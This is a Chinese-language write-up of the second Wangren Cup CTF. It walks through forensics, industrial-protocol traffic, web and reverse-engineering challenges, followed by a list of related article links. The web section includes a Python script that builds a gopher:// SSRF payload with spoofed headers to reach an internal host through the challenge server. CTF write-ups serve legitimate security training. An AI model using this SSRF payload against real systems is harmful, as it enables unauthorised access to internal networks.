第二届网刃杯网络安全大赛 Writeup
第二届网刃杯网络安全大赛 Writeup
- 前言
- MISC
- 玩坏的XP *
- ISC
- ncsubj
- carefulguy
- easyiec
- xypo7
- 喜欢移动的黑客*
- LED_BOOM*
- 需要安全感*
- cryptolalia*
- WEB
- Sign_in
- RE
- freestye
- ez_algorithm
- Re_function
前言
看了去年的这个比赛,感觉难度比较适中,于是尝试今年去参加一下。成绩也不是很好感觉打CTF还是需要一定的经验,节奏和时间没安排好,导致上午出了五个题后下午就再没出题,有点小遗憾。取证题也没出…还是得多看看套神博客。
MISC
玩坏的XP *
解压后发现是虚拟磁盘文件,使用DiskGenius挂载后分析。
查看桌面有五张图片。看meiren.png就感觉有点问题,提取出来进行查看。
使用formost分解图片,发现能分解出压缩包和图片,图片里有两张meiren图,压缩包解压出来之后是一张not flag的图片,继续分解no flag的图片。得到一个压缩包但是需要密码,但是我这里居然没有提醒,提醒的文件上写着:密码容易忘所以放在了某个挂着项链的软件上了
这里没有安装过QQ所以查看是否还有其他的软件符合他的要求。
这里找到了火狐浏览器的位置,看到了几个QQ的相关信息还以为是需要我们再里面找,实际上是要我们再places.sqlit
中找相关的信息,导出该数据,使用软件来查看里面的数据库数据。
下一个即可,进行查看。
直接查看相关的QQ号,查看QQ空间。
密码MD5之后的样子,在线解密即可。
得到xiaomin520
,然后解压压缩包即可拿到flag。
ISC
ncsubj
跟踪协议流
拿出来base64解码后,去掉|再来一次解密即可。
carefulguy
跟踪流:7d开始
66结束
提取出来hex解码,逆序即可。
easyiec
字符串搜索,即可。
xypo7
直接解压文件发现需要密码,查看文件末尾有附加数据,发现是base64的形式。
提取出来不断base64解码即可拿到密码。Xyp77&7&77
,然后发现奇怪的数据,直接解码base91。
喜欢移动的黑客*
pcapng流量包头部损坏,把FF FF FF FF改成 0A 0D 0A 0D即可打开。哎这个题没出实着可惜,我还一直以为pcap和pcapng是一种数据结构,当时脑抽了没有看前面的文件格式,按照pcap的格式去改发现一直不对。改完之后直接所定数据data即可。
就几个数据包,一个一个看即可。
flag{1008668156}
LED_BOOM*
这个题也是找不到具有三个相同特征的流量包,没看到开灯的操作记录。花了挺多的时间。
mouchu师傅博客上写着过滤西门子协议后按照包的大小来找会更快一些,经验比较短缺一时想不到这样来找。
查看内容包:
于是这三个包加起来就是:585692787
密文给出的是:
AES解密:
需要安全感*
这个是三菱的一个文件 按照我做题前的感觉是下了软件之后直接在里面就就可以找到flag 但是比赛结束了软件还没下好。套神WP证明确实是这个思路。G…
cryptolalia*
给了一张工业的污水处理过程,简单查看了一下直接分解图片。
查看污泥脱水间数据详情.zip
,官方hint:直接爆破即可,数字加大写字母爆破。
得到密码:G6H7
查看里面的流量包,发现有经过对称加密算法加密的字符串。
U2FsdGVkX19pczQKWsMcjgrJt8f09dSN
官方给出的提示:鱼 is very important,那么密钥就是fish了,一个一个尝试需要密码的加密即可拿到下一个压缩包的解压密码。
解密网站:对称加密网址
b0Le4n$
继续解压下一个压缩包,解压出来之后发现还有一个压缩包,发现还需要密码,使用十六进制查看器查看数据。
改为00即可。
然后查看西门子的协议,跟踪流后发现有图像数据想办法提取出来。
参考链接:套神博客
提取方式:tshark -r .\设备药剂间数据采集.pcap -T fields -e s7comm.resp.data -Y s7comm > pic.txt
# 已经去除了前后的数据
import binasciihexdata = ""
with open("pic.txt","r") as file:hexdata = file.read().split()
hexdata = "".join(hexdata)
print(hexdata[0:16])with open("png.png","wb") as file2:file2.write(binascii.unhexlify(hexdata))
把这个放到图片中即可。
使用010修改高度即可。
WEB
Sign_in
签到题都ssrf了,哎~。
ssrf结合gopher打内网,进行内网探测。
***
import urllib.parse
url='http://124.222.24.150:8091/?url='
ctf=\
"""POST /?a HTTP/1.1
Host: 172.73.23.100:80
X-Forwarded-For:127.0.0.1
Referer:bolean.club
Content-Type:application/x-www-form-urlencoded
Content-Length:1
b
"""
tmp = urllib.parse.quote(ctf)
new = tmp.replace('%0A','%0D%0A')
res = '_'+new
res=urllib.parse.quote(res)
exp='gopher://172.73.23.100:80/'+res
print(exp)
RE
freestye
逆回去看一下两个函数,分别队输入的字符串使用atoc函数转化尾数字 然后与后面的值进行比对,简单的数据计算即可拿到结果。
手算第一个:3327 第二个:105 MD5后即可。
ez_algorithm
是个比较复杂的,但是是可以爆破的,每一位都和动调时的相同,这样就爆出了,算是个非预期吧。
rax中有:
Re_function
发现不能解压,但是给出了一张图片的数据估计密码就在上面。将数据写入一张图片即可。
import binasciihexdata = ""
with open("png.txt","r") as file:hexdata = file.read().split()
hexdata = "".join(hexdata)
print(hexdata[0:16])with open("png.png","wb") as file2:file2.write(binascii.unhexlify(hexdata))
#3CF8
有两个文件,一个是32为exe,另一个是64为的elf文件
exe文件直接看c伪代码没看懂感觉好乱看不懂,直接看汇编吧。
然后经过一整调试发现,是将我们输入的奇数位与0x37异或然后得到了一串字符。
然后看elf文件,魔改的base64算法,只换了字符串表然后解即可。
flag{we1come_t0_wrb}
第二届网刃杯网络安全大赛 Writeup相关推荐
- 2022第二届网刃杯网络安全大赛-Web
2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yy ...
- 2022第二届网刃杯网络安全大赛-Re
2022第二届网刃杯网络安全大赛-Re 前言 提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一.RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入 ...
- 2022第二届网刃杯网络安全大赛-ICS
2022第二届网刃杯网络安全大赛-ICS 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.ICS1-ncsubj 难度系数:4.0 题目描述:wowowow,某厂商上位机TIA ...
- 2022第二届网刃杯网络安全大赛
目录 前言 一.ICS1-ncsubj 二.ICS2-carefulguy 三.ICS3-喜欢移动的黑客 四.ICS4-easyiec 五.ICS5-xyp07
- 2021第一届网刃杯网络安全大赛-老练的黑客
2021第一届网刃杯网络安全大赛-老练的黑客 难度系数:4.0 题目描述:一黑客成功入侵某核电站且获得了操作员站控制权,该操作员站可控制离心机的转速,当离心机的转速持续高于5000时将导致设备损坏,为 ...
- 首届“网刃杯”网络安全大赛部分WP
这是之前打比赛写的WP,供大家参考 藏在S7里的秘密 1.修复流量包 下载流量包打开后发现提示错报 The file"S7.pcap" isn't a capture file i ...
- 第二届网刃杯 ICS+Misc wp
文章目录 ICS LED_BOOM carefulguy 喜欢移动的黑客 easyiec xyp07 需要安全感 cryptolalia Misc 玩坏的winxp ICS LED_BOOM 一段对称 ...
- 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup
2020年第二届"网鼎杯"网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download ...
- [ CTF ]【天格】战队WriteUp- 2022年第三届“网鼎杯”网络安全大赛(青龙组)
2022年第三届"网鼎杯"网络安全大赛(青龙组)部分题目附件 已解题列表 [Misc]签到 [Crypto]crypto405 [Crypto]crypto091 [Pwn]pwn ...
最新文章
- java下载zip_从Servlet Java下载zip
- 在同一基准下对前端框架进行比较(2019年更新)
- Spring Data 系列(二) Spring+JPA入门(集成Hibernate)
- VBA操作word生成sql语句
- Linux C解析命令行参数代码
- linux下mysql的忘记root密码的解决办法
- 迪杰斯特拉算法c语言实现
- 命令杀mysql进程
- 单元测试用例设计原则
- 浅谈人工智能 | 语音识别面面观
- Knowledge Representation笔记
- Basic SRVCC 基本SRVCC 信令流程
- Kubernetes 健康状态检查(九)
- RF信号下采样/矩阵下采样(附python实现代码)
- python地址怎么写_python文件地址(文件路径)怎么写
- Mac 上必备的常用软件,你值得拥有
- 【下载!】免费经典的计算机教学视频,向孙鑫老师致敬!
- WordCloud生成卡卡西忍术词云
- 【AI视野·今日NLP 自然语言处理论文速览 第二十三期】Tue, 28 Sep 2021
- Paradigms Homework1 一个超小型二元一次方程组计算器
热门文章
- MATLAB高精度计算开源工具箱【全网首发windows版】
- DES加密之强制更新下载分离器
- 安卓apk在CentOS上自动化编译打包发布
- Thinkphp--Auth权限控制
- reactos操作系统实现(1)
- 班班通计算机工作总结,初中班班通培训工作总结
- Error retrieving https://nvd.nist.gov/feeds/json/cve/1.0/nvdcve-1.0-modified.meta; received 404
- 基于纷享销客开放平台,实现纷享CRM与金蝶云星空系统数据同步
- ODATA入门:Association 和 Navigation实现(GET_EXPANDED_ENTITY)
- 阿里Java岗二面:Redis了解?说说持久化机制及RDB/AOF应用场景分析